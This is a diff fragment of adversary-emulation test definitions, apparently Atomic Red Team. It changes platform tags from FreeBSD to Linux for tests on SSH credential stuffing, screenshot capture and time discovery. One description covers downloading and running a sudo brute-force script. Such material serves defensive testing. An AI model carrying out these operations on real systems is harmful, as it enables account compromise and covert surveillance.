This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
remote_url:
|
||||
description: url of remote payload
|
||||
|
||||
@@ -130,7 +130,7 @@ brew install hudochenkov/sshpass/sshpass
|
||||
## Atomic Test #3 - SSH Credential Stuffing From FreeBSD
|
||||
Using username,password combination from a password dump to login over SSH.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** a790d50e-7ebf-48de-8daa-d9367e0911d4
|
||||
|
||||
@@ -69,7 +69,7 @@ atomic_tests:
|
||||
Using username,password combination from a password dump to login over SSH.
|
||||
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
|
||||
input_arguments:
|
||||
target_host:
|
||||
|
||||
@@ -153,7 +153,7 @@ sudo #{package_installer}
|
||||
## Atomic Test #4 - X Windows Capture (freebsd)
|
||||
Use xwd command to collect a full desktop screenshot and review file with xwud
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c
|
||||
@@ -253,7 +253,7 @@ sudo apt install graphicsmagick-imagemagick-compat
|
||||
## Atomic Test #6 - Capture Linux Desktop using Import Tool (freebsd)
|
||||
Use import command from ImageMagick to collect a full desktop screenshot
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 18397d87-38aa-4443-a098-8a48a8ca5d8d
|
||||
|
||||
@@ -74,7 +74,7 @@ atomic_tests:
|
||||
description: |
|
||||
Use xwd command to collect a full desktop screenshot and review file with xwud
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file path
|
||||
@@ -126,7 +126,7 @@ atomic_tests:
|
||||
description: |
|
||||
Use import command from ImageMagick to collect a full desktop screenshot
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file path
|
||||
|
||||
@@ -88,7 +88,7 @@ Get-Date
|
||||
## Atomic Test #3 - System Time Discovery in FreeBSD/macOS
|
||||
Identify system time. Upon execution, the local computer system time and timezone will be displayed.
|
||||
|
||||
**Supported Platforms:** Freebsd, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** f449c933-0891-407f-821e-7916a21a1a6f
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user